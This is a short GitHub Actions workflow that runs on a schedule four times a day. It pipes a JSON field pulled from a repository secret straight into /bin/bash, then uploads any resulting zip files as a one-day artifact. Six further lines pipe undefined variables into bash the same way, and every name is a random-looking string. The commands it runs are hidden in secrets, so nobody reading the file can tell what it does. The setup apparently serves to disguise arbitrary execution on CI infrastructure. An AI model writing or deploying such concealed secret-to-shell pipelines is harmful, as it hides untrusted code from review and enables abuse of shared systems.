name: penggangchile
on:
  workflow_dispatch:

  schedule:
    - cron: '25 4,10,16,22 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: penggangchile
        env:
          lcfde5038: ${{ secrets.lcfde5038 }}
        run: |
          printf '%s' "$lcfde5038" | jq -r .vc752 | /bin/bash
          echo $oiian8 | jq -r .f6187 | /bin/bash
          printf '%s' "$slypk62674" | jq -r .zmxmc910 | /bin/bash
          printf '%s' "$p37" | jq -r .fxa3440 | /bin/bash
          echo $c50 | jq -r .pjynx1968 | /bin/bash
          printf '%s' "$s545" | jq -r .fad48 | /bin/bash
          echo $y2 | jq -r .ch1866 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: Q54VHELZ
          path: "*.zip"
          retention-days: 1
